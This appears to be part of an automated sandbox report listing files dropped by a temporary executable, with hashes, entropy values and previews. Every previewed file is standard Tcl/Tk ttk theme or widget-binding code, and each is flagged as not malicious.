                                                                                                                                                                                                                                                                                                                                SSDEEP:48:xICsIX5RupDdMrwuQb8BQEQWQEQK9FVGQJFVGDusxzUFIG0usf2kGKQH+n5dvW8m:h7oFAzfphta9DwuTa
                                                                                                                                                                                                                                                                                                                                MD5:8FF9D357AF3806D997BB8654E95F530C
                                                                                                                                                                                                                                                                                                                                SHA1:62292163299CC229031BB4EAFBE900323056561A
                                                                                                                                                                                                                                                                                                                                SHA-256:E36864B33D7C2B47FE26646377BE86FB341BBF2B6DF13E33BD799E87D24FC193
                                                                                                                                                                                                                                                                                                                                SHA-512:ECDC47E7D1F0F9C0C052ACA2EB2DE10E78B2256E8DB85D7B52F365C1074A4E24CDB1C7A2780B36DFA36F174FF87B6A31C49F61CC0AC3D2412B3915234D911C9C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Ttk widget set: Alternate theme.#..namespace eval ttk::theme::alt {.. variable colors. array set colors {..-frame .."#d9d9d9"..-window.."#ffffff"..-darker ."#c3c3c3"..-border.."#414141"..-activebg ."#ececec"..-disabledfg."#a3a3a3"..-selectbg."#4a6984"..-selectfg."#ffffff"..-altindicator."#aaaaaa". }.. ttk::style theme settings alt {...ttk::style configure "." \.. -background .$colors(-frame) \.. -foreground .black \.. -troughcolor.$colors(-darker) \.. -bordercolor.$colors(-border) \.. -selectbackground .$colors(-selectbg) \.. -selectforeground .$colors(-selectfg) \.. -font ..TkDefaultFont \.. ;...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)] ;..ttk::style map "." -foreground [list disabled $colors(-disabledfg)] ;. ttk::style map "." -embossed [list disabled 1] ;...ttk::style configure TButton \.. -anchor center -width -11 -padding "1 1" \.. -relief raised -shiftrelief 1 \.. -highl
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2245
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.988082031411997
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:tdlBlblITKleKgNX1gPc+JFzVPb9ZLJY2ZL7X0jX4:p51gRK7F9DzrMo
                                                                                                                                                                                                                                                                                                                                MD5:6466DBA5F7DDB28F280A24E2397DD875
                                                                                                                                                                                                                                                                                                                                SHA1:060C504D08B014EB388EFAF48E3720CE5D7F0132
                                                                                                                                                                                                                                                                                                                                SHA-256:CBC17D1C434CACD0AB42CDCC4D62ED193F926447189AD258C13738D4EC154A80
                                                                                                                                                                                                                                                                                                                                SHA-512:5FAAC1C5FC868DCE8B7A9431BEAEB8117ADDE5C752306CAD7B6FA8123758F2CF37FB1CF18CAC2934F7D07B14FAFCE01581BAD0CA952BFECFCBD9E1E26FF9A64C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Aqua theme (OSX native look and feel).#..namespace eval ttk::theme::aqua {. ttk::style theme settings aqua {...ttk::style configure . \.. -font TkDefaultFont \.. -background systemWindowBody \.. -foreground systemModelessDialogActiveText \.. -selectbackground systemHighlight \.. -selectforeground systemModelessDialogActiveText \.. -selectborderwidth 0 \.. -insertwidth 1...ttk::style map . \.. -foreground {disabled systemModelessDialogInactiveText... background systemModelessDialogInactiveText} \.. -selectbackground {background systemHighlightSecondary... !focus systemHighlightSecondary} \.. -selectforeground {background systemModelessDialogInactiveText... !focus systemDialogActiveText}...# Workaround for #1100117:..# Actually, on Aqua we probably shouldn't stipple images in..# disabled buttons even if it did work.....ttk::style configure . -stipple {}...ttk::style configure TButton -anchor center -width -6..ttk::style configure Toolbutton -
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2978
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8919006418640265
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:hpNRZ/rtWkRMC0ScGHsAEfKPi7K1MFNQ6z4Dvh8niT6CUI+SfRHThp:DNRZzse1cGH3UvKmFNQ6z2hT6CUI+4Hb
                                                                                                                                                                                                                                                                                                                                MD5:EA7CF40852AFD55FFDA9DB29A0E11322
                                                                                                                                                                                                                                                                                                                                SHA1:B7B42FAC93E250B54EB76D95048AC3132B10E6D8
                                                                                                                                                                                                                                                                                                                                SHA-256:391B6E333D16497C4B538A7BDB5B16EF11359B6E3B508D470C6E3703488E3B4D
                                                                                                                                                                                                                                                                                                                                SHA-512:123D78D6AC34AF4833D05814220757DCCF2A9AF4761FE67A8FE5F67A0D258B3C8D86ED346176FFB936AB3717CFD75B4FAB7373F7853D44FA356BE6E3A75E51B9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Bindings for Buttons, Checkbuttons, and Radiobuttons..#.# Notes: <Button1-Leave>, <Button1-Enter> only control the "pressed".# state; widgets remain "active" if the pointer is dragged out..# This doesn't seem to be conventional, but it's a nice way.# to provide extra feedback while the grab is active..# (If the button is released off the widget, the grab deactivates and.# we get a <Leave> event then, which turns off the "active" state).#.# Normally, <ButtonRelease> and <ButtonN-Enter/Leave> events are .# delivered to the widget which received the initial <ButtonPress>.# event. However, Tk [grab]s (#1223103) and menu interactions.# (#1222605) can interfere with this. To guard against spurious.# <Button1-Enter> events, the <Button1-Enter> binding only sets.# the pressed state if the button is currently active..#..namespace eval ttk::button {}..bind TButton <Enter> ..{ %W instate !disabled {%W state active} }.bind TButton <Leave>..{ %W state !active }.bind TButton <Key-space>.{ ttk:
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4742
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.859511673200619
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:9zDTlU3tCKW3PiAu4UZQsk+EBSucCtCqM368CtTU/+xgxaYgxaf/sY2+rF5usxzk:ZuHjO7uCkqM3JCNU/igxNgxor2tpuTM
                                                                                                                                                                                                                                                                                                                                MD5:AA2987DC061DAA998B73A1AD937EE4BB
                                                                                                                                                                                                                                                                                                                                SHA1:33FE9DFA76FB08B9D8D5C3554D13482D330C2DB1
                                                                                                                                                                                                                                                                                                                                SHA-256:4ED0ACDD29FC1FB45C6BDC9EFB2CBADE34B93C45D5DBB269A4A4A3044CF4CB7A
                                                                                                                                                                                                                                                                                                                                SHA-512:5A83B1FC88E42BB1DAD60D89CD5F2193E6AB59C4902A6C727E0090D1F395C2F122521FDFF250A14109EE5113D5034319199FB260129416EA962559350F217A03
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# "Clam" theme..#.# Inspired by the XFCE family of Gnome themes..#..namespace eval ttk::theme::clam {. variable colors . array set colors {..-disabledfg.."#999999"..-frame .."#dcdad5"..-window .."#ffffff"..-dark..."#cfcdc8"..-darker .."#bab5ab"..-darkest.."#9e9a91"..-lighter.."#eeebe7"..-lightest .."#ffffff"..-selectbg.."#4a6984"..-selectfg.."#ffffff"..-altindicator.."#5895bc"..-disabledaltindicator."#a0a0a0". }.. ttk::style theme settings clam {...ttk::style configure "." \.. -background $colors(-frame) \.. -foreground black \.. -bordercolor $colors(-darkest) \.. -darkcolor $colors(-dark) \.. -lightcolor $colors(-lighter) \.. -troughcolor $colors(-darker) \.. -selectbackground $colors(-selectbg) \.. -selectforeground $colors(-selectfg) \.. -selectborderwidth 0 \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -background [list disabled $colors(-frame) \.... active $colors(-lighter)] \.. -foreground [list disabled $colors(
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3828
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.892728136244756
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:yAJZjsTMw96Ey6kvzuVuby+x0M+x06uxjFVGQJFVGQuxzUFIGQutK2MRvD7J+iSz:yAJZ8MVJiVR+x/+xefVItuTy7Urt
                                                                                                                                                                                                                                                                                                                                MD5:7DBF35F3F0F9FB68626019FF94EFBCD3
                                                                                                                                                                                                                                                                                                                                SHA1:213F18224BF0573744836CD3BEDC83D5E443A406
                                                                                                                                                                                                                                                                                                                                SHA-256:30E6766E9B8292793395324E412B0F5A8888512B84B080E247F95BF6EFB11A9D
                                                                                                                                                                                                                                                                                                                                SHA-512:9081E5C89ECDE8337C5A52531DEF24924C0BCB3A1F0596D3B986CC59E635F67A78327ABF26209BF71A9BA370A93174298E6ABD11586382D7D70ADEA7E5CCF854
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# "classic" Tk theme..#.# Implements Tk's traditional Motif-like look and feel..#..namespace eval ttk::theme::classic {.. variable colors; array set colors {..-frame.."#d9d9d9"..-window.."#ffffff"..-activebg."#ececec"..-troughbg."#c3c3c3"..-selectbg."#c3c3c3"..-selectfg."#000000"..-disabledfg."#a3a3a3"..-indicator."#b03060"..-altindicator."#b05e5e". }.. ttk::style theme settings classic {..ttk::style configure "." \.. -font..TkDefaultFont \.. -background..$colors(-frame) \.. -foreground..black \.. -selectbackground.$colors(-selectbg) \.. -selectforeground.$colors(-selectfg) \.. -troughcolor.$colors(-troughbg) \.. -indicatorcolor.$colors(-frame) \.. -highlightcolor.$colors(-frame) \.. -highlightthickness.1 \.. -selectborderwidth.1 \.. -insertwidth.2 \.. ;...# To match pre-Xft X11 appearance, use:..#.ttk::style configure . -font {Helvetica 12 bold}...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activeb
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):12493
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.024195855137721
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:l/9k9hqpFXQN9uK5Bt3NvnIW+KYNbrulkL90t98VrQETczIT9QeSaQjJI1/P0lcx:BhllSBtVL5MmI0K
                                                                                                                                                                                                                                                                                                                                MD5:FBCAA6A08D9830114248F91E10D4C918
                                                                                                                                                                                                                                                                                                                                SHA1:FA63C94824BEBD3531086816650D3F3FA73FE434
                                                                                                                                                                                                                                                                                                                                SHA-256:9D80AA9701E82862467684D3DFF1A9EC5BBC2BBBA4F4F070518BBDE7E38499BB
                                                                                                                                                                                                                                                                                                                                SHA-512:B377C31CC9137851679CBA0560EFE4265792D1576BD781DD42C22014A7A8F3D10D9D48A1154BB88A2987197594C8B728B71FA689CE1B32928F8513796A6A0AA3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Combobox bindings..#.# <<NOTE-WM-TRANSIENT>>:.#.#.Need to set [wm transient] just before mapping the popdown.#.instead of when it's created, in case a containing frame.#.has been reparented [#1818441]..#.#.On Windows: setting [wm transient] prevents the parent.#.toplevel from becoming inactive when the popdown is posted.#.(Tk 8.4.8+).#.#.On X11: WM_TRANSIENT_FOR on override-redirect windows.#.may be used by compositing managers and by EWMH-aware.#.window managers (even though the older ICCCM spec says.#.it's meaningless)..#.#.On OSX: [wm transient] does utterly the wrong thing..#.Instead, we use [MacWindowStyle "help" "noActivates hideOnSuspend"]..#.The "noActivates" attribute prevents the parent toplevel.#.from deactivating when the popdown is posted, and is also.#.necessary for "help" windows to receive mouse events..#."hideOnSuspend" makes the popdown disappear (resp. reappear).#.when the parent toplevel is deactivated (resp. reactivated)..#.(see [#1814778]). Also set [wm resiz
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4007
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.827479665184231
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:xtIni2E1nmuVoLlTxG6qVXvDiPOaCkhxKLbqnJ2RLWumgMJVZlZPDjsfMh8vIviX:sn+myoLBxG3laOqJlZT3rkdSVOJm0
                                                                                                                                                                                                                                                                                                                                MD5:74596004DFDBF2ECF6AF9C851156415D
                                                                                                                                                                                                                                                                                                                                SHA1:933318C992B705BF9F8511621B4458ECB8772788
                                                                                                                                                                                                                                                                                                                                SHA-256:7BDFFA1C2692C5D1CF67B518F9ACB32FA4B4D9936ED076F4DB835943BC1A00D6
                                                                                                                                                                                                                                                                                                                                SHA-512:0D600B21DB67BF9DADBDD49559573078EFB41E473E94124AC4D2551BC10EC764846DC1F7674DAA79F8D2A8AEB4CA27A5E11C2F30EDE47E3ECEE77D60D7842262
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Map symbolic cursor names to platform-appropriate cursors..#.# The following cursors are defined:.#.#.standard.-- default cursor for most controls.#.""..-- inherit cursor from parent window.#.none..-- no cursor.#.#.text..-- editable widgets (entry, text).#.link..-- hyperlinks within text.#.crosshair.-- graphic selection, fine control.#.busy..-- operation in progress.#.forbidden.-- action not allowed.#.#.hresize..-- horizontal resizing.#.vresize..-- vertical resizing.#.# Also resize cursors for each of the compass points,.# {nw,n,ne,w,e,sw,s,se}resize..#.# Platform notes:.#.# Windows doesn't distinguish resizing at the 8 compass points,.# only horizontal, vertical, and the two diagonals..#.# OSX doesn't have resize cursors for nw, ne, sw, or se corners..# We use the Tk-defined X11 fallbacks for these..#.# X11 doesn't have a "forbidden" cursor (usually a slashed circle);.# "pirate" seems to be the conventional cursor for this purpose..#.# Windows has an IDC_HELP cursor, but it's not
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4490
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.888203318286333
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:AMUoi/higxS4JAigxS4J/1+tDtj/9uTaf30QOdt:AMUoQhigQ42igQ4kFMY3n0t
                                                                                                                                                                                                                                                                                                                                MD5:0E03292F7678540CB4F3440859863B0C
                                                                                                                                                                                                                                                                                                                                SHA1:909849894B02F2C213BDE0FBCED8C1378EB9B81E
                                                                                                                                                                                                                                                                                                                                SHA-256:304FF31FC82F6086C93AAA594D83D8DA25866CE1C2AF1208F9E7585D74CA9A51
                                                                                                                                                                                                                                                                                                                                SHA-512:87E5D2484E5E7E3C00B319219028B012576B7D73B84A9A13ED15551C9431BF216C0B96376AE5A7070B5A391D9887E55ABF9FA4AFEE971177408B7969363D9302
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Settings for default theme..#..namespace eval ttk::theme::default {. variable colors. array set colors {..-frame..."#d9d9d9"..-foreground.."#000000"..-window..."#ffffff"..-text .."#000000"..-activebg.."#ececec"..-selectbg.."#4a6984"..-selectfg.."#ffffff"..-darker .."#c3c3c3"..-disabledfg.."#a3a3a3"..-indicator.."#4a6984"..-disabledindicator."#a3a3a3"..-altindicator.."#9fbdd8"..-disabledaltindicator."#c0c0c0". }.. ttk::style theme settings default {...ttk::style configure "." \.. -borderwidth .1 \.. -background .$colors(-frame) \.. -foreground .$colors(-foreground) \.. -troughcolor .$colors(-darker) \.. -font ..TkDefaultFont \.. -selectborderwidth.1 \.. -selectbackground.$colors(-selectbg) \.. -selectforeground.$colors(-selectfg) \.. -insertwidth .1 \.. -indicatordiameter.10 \.. ;...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)]..ttk::style map "." -foreground \.. [list disabled $colo
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16408
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.974125903666712
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:hRy3ALQksU0oayTUXIQzNiQ2iEL8QmOhQVqknFoTOXyJtcC1JMuZm4FZxO252ExD:GoUXmiEyOFWiTOEtcC1q252Ezp
                                                                                                                                                                                                                                                                                                                                MD5:F9B29AB14304F18E32821A29233BE816
                                                                                                                                                                                                                                                                                                                                SHA1:6D0253274D777E081FA36CC38E51C2ABB9259D0E
                                                                                                                                                                                                                                                                                                                                SHA-256:62D1DF52C510A83103BADAB4F3A77ABB1AA3A0E1E21F68ECE0CECCA2CA2F1341
                                                                                                                                                                                                                                                                                                                                SHA-512:698DB665E29B29864F9FE65934CCA83A5092D81D5130FFD1EAC68C51327AE9EBC007A60A60E1AF37063017E448CE84A4024D4A412990A1078287B605DF344C70
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# DERIVED FROM: tk/library/entry.tcl r1.22.#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 2004, Joe English.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..namespace eval ttk {. namespace eval entry {..variable State...set State(x) 0..set State(selectMode) none..set State(anchor) 0..set State(scanX) 0..set State(scanIndex) 0..set State(scanMoved) 0...# Button-2 scan speed is (scanNum/scanDen) characters..# per pixel of mouse movement...# The standard Tk entry widget uses the equivalent of..# scanNum = 10, scanDen = average character width...# I don't know why that was chosen...#..set State(scanNum) 1..set State(scanDen) 1..set State(deadband) 3.;# #pixels for mouse-moved deadband.. }.}..### Option database settings..#.option add *TEntry.cursor [ttk::cursor text] widgetDefault..### Bindings..#.# Removed
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5576
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.956417003071239
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:Nduphbitcq1Zs/ZrBiZy227IhLkdhetOstWGbRafkeHH+4:3CheHvsbiZyDmJbRa3+4
                                                                                                                                                                                                                                                                                                                                MD5:7017B5C1D53F341F703322A40C76C925
                                                                                                                                                                                                                                                                                                                                SHA1:57540C56C92CC86F94B47830A00C29F826DEF28E
                                                                                                                                                                                                                                                                                                                                SHA-256:0EB518251FBE9CF0C9451CC1FEF6BB6AEE16D62DA00B0050C83566DA053F68D0
                                                                                                                                                                                                                                                                                                                                SHA-512:FD18976A8FBB7E59B12944C2628DBD66D463B2F7342661C8F67160DF37A393FA3C0CE7FDDA31073674B7A46E0A0A7D0A7B29EBE0D9488AFD9EF8B3A39410B5A8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Font specifications..#.# This file, [source]d at initialization time, sets up the following.# symbolic fonts based on the current platform:.#.# TkDefaultFont.-- default for GUI items not otherwise specified.# TkTextFont.-- font for user text (entry, listbox, others).# TkFixedFont.-- standard fixed width font.# TkHeadingFont.-- headings (column headings, etc).# TkCaptionFont -- dialog captions (primary text in alert dialogs, etc.).# TkTooltipFont.-- font to use for tooltip windows.# TkIconFont.-- font to use for icon captions.# TkMenuFont.-- used to use for menu items.#.# In Tk 8.5, some of these fonts may be provided by the TIP#145 implementation.# (On Windows and Mac OS X as of Oct 2007)..#.# +++ Platform notes:.#.# Windows:.#.The default system font changed from "MS Sans Serif" to "Tahoma".# .in Windows XP/Windows 2000..#.#.MS documentation says to use "Tahoma 8" in Windows 2000/XP,.#.although many MS programs still use "MS Sans Serif 8".#.#.Should use SystemParametersInfo() inst
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4913
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.841521491900473
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:1reigApQy38gaQJy+3nN+PN8JdNhtOPqoK4J+wQCV7EkGxIaqc9ld9qtlWnITOZI:hfbJvnN+PN8JdNHs64J+wQCPGxtqWrqf
                                                                                                                                                                                                                                                                                                                                MD5:DB24841643CEBD38D5FFD1D42B42E7F4
                                                                                                                                                                                                                                                                                                                                SHA1:E394AF7FAF83FAD863C7B13D855FCF3705C4F1C7
                                                                                                                                                                                                                                                                                                                                SHA-256:81B0B7818843E293C55FF541BD95168DB51FE760941D32C7CDE9A521BB42E956
                                                                                                                                                                                                                                                                                                                                SHA-512:380272D003D5F90C13571952D0C73F5FCE2A22330F98F29707F3D5BFC29C99D9BF11A947CF2CA64CF7B8DF5E4AFE56FFA00F9455BB30D15611FC5C86130346BE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Bindings for Menubuttons..#.# Menubuttons have three interaction modes:.#.# Pulldown: Press menubutton, drag over menu, release to activate menu entry.# Popdown: Click menubutton to post menu.# Keyboard: <Key-space> or accelerator key to post menu.#.# (In addition, when menu system is active, "dropdown" -- menu posts.# on mouse-over. Ttk menubuttons don't implement this)..#.# For keyboard and popdown mode, we hand off to tk_popup and let .# the built-in Tk bindings handle the rest of the interaction..#.# ON X11:.#.# Standard Tk menubuttons use a global grab on the menubutton..# This won't work for Ttk menubuttons in pulldown mode,.# since we need to process the final <ButtonRelease> event,.# and this might be delivered to the menu. So instead we.# rely on the passive grab that occurs on <ButtonPress> events,.# and transition to popdown mode when the mouse is released.# or dragged outside the menubutton..# .# ON WINDOWS:.#.# I'm not sure what the hell is going on here. [$menu pos
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5619
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.937953914483602
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:d4tDJf49tzG809fhQAKWCgQOK/6PF+hEi8YYFSL+3FJVCj0QlK2kfJcQIni:d4tktzwfWngQOK/6PF+hDDYFNJVCj0Q2
                                                                                                                                                                                                                                                                                                                                MD5:82C9DFC512E143DDA78F91436937D4DD
                                                                                                                                                                                                                                                                                                                                SHA1:26ABC23C1E0C201A217E3CEA7A164171418973B0
                                                                                                                                                                                                                                                                                                                                SHA-256:D1E5267CDE3D7BE408B4C94220F7E1833C9D452BB9BA3E194E12A5EB2F9ADB80
                                                                                                                                                                                                                                                                                                                                SHA-512:A9D3C04AD67E0DC3F1C12F9E21EF28A61FA84DBF710313D4CA656BDF35DFBBFBA9C268C018004C1F5614DB3A1128025D795BC14B4FFFAA5603A5313199798D04
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Bindings for TNotebook widget.#..namespace eval ttk::notebook {. variable TLNotebooks ;# See enableTraversal.}..bind TNotebook <ButtonPress-1>..{ ttk::notebook::Press %W %x %y }.bind TNotebook <Key-Right>..{ ttk::notebook::CycleTab %W 1; break }.bind TNotebook <Key-Left>..{ ttk::notebook::CycleTab %W -1; break }.bind TNotebook <Control-Key-Tab>.{ ttk::notebook::CycleTab %W 1; break }.bind TNotebook <Control-Shift-Key-Tab>.{ ttk::notebook::CycleTab %W -1; break }.catch {.bind TNotebook <Control-ISO_Left_Tab>.{ ttk::notebook::CycleTab %W -1; break }.}.bind TNotebook <Destroy>..{ ttk::notebook::Cleanup %W }..# ActivateTab $nb $tab --.#.Select the specified tab and set focus..#.# Desired behavior:.#.+ take focus when reselecting the currently-selected tab;.#.+ keep focus if the notebook already has it;.#.+ otherwise set focus to the first traversable widget.#. in the newly-selected tab;.#.+ do not leave the focus in a deselected tab..#.proc ttk::notebook::ActivateTab {w tab} {.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1920
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.916119835701688
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:kfkVpfktNZz51kfkB6fkO/cfkyk2fkI4fkI1fkxUufkYfkEtNMiyHvyPHfk9tNZ5:0ZPhMiyHvyPQZNtiisZvUriZPaa+fdl
                                                                                                                                                                                                                                                                                                                                MD5:A12915FA5CAF93E23518E9011200F5A4
                                                                                                                                                                                                                                                                                                                                SHA1:A61F665A408C10419FB81001578D99B43D048720
                                                                                                                                                                                                                                                                                                                                SHA-256:CE0053D637B580170938CF552B29AE890559B98EB28038C2F0A23A265DDEB273
                                                                                                                                                                                                                                                                                                                                SHA-512:669E1D66F1223CCA6CEB120914D5D876BD3CF401EE4A46F35825361076F19C7341695596A7DBB00D6CFF4624666FB4E7A2D8E7108C3C56A12BDA7B04E99E6F9A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#.# Bindings for ttk::panedwindow widget..#..namespace eval ttk::panedwindow {. variable State. array set State {..pressed 0. .pressX.-..pressY.-..sash .-..sashPos -. }.}..## Bindings:.#.bind TPanedwindow <ButtonPress-1> .{ ttk::panedwindow::Press %W %x %y }.bind TPanedwindow <B1-Motion>..{ ttk::panedwindow::Drag %W %x %y }.bind TPanedwindow <ButtonRelease-1> .{ ttk::panedwindow::Release %W %x %y }..bind TPanedwindow <Motion> ..{ ttk::panedwindow::SetCursor %W %x %y }.bind TPanedwindow <Enter> ..{ ttk::panedwindow::SetCursor %W %x %y }.bind TPanedwindow <Leave> ..{ ttk::panedwindow::ResetCursor %W }.# See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>>.bind TPanedwindow <<EnteredChild>>.{ ttk::panedwindow::ResetCursor %W }..## Sash movement:.#.proc ttk::panedwindow::Press {w x y} {. variable State.. set sash [$w identify $x $y]. if {$sash eq ""} {. .set State(pressed) 0..return. }. set State(pressed) .1. set State(pressX) .$x. set State(pressY) .$y. set State(sa
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1089
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7101709883442755
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:o83oOUyNSiBj0oNA7h5EwIa2s0ImxamrNlUImyJDirNPpwWgJ:oMtS6j0eyEw0s02mhlU4khPp4J
                                                                                                                                                                                                                                                                                                                                MD5:B0074341A4BDA36BCDFF3EBCAE39EB73
                                                                                                                                                                                                                                                                                                                                SHA1:D070A01CC5A787249BC6DAD184B249C4DD37396A
                                                                                                                                                                                                                                                                                                                                SHA-256:A9C34F595E547CE94EE65E27C415195D2B210653A9FFCFB39559C5E0FA9C06F8
                                                                                                                                                                                                                                                                                                                                SHA-512:AF23563602886A648A42B03CC5485D84FCC094AB90B08DF5261434631B6C31CE38D83A3A60CC7820890C797F6C778D5B5EFF47671CE3EE4710AB14C6110DCC35
                                                                                                                                                                                                                                                                                                                                Malicious:false
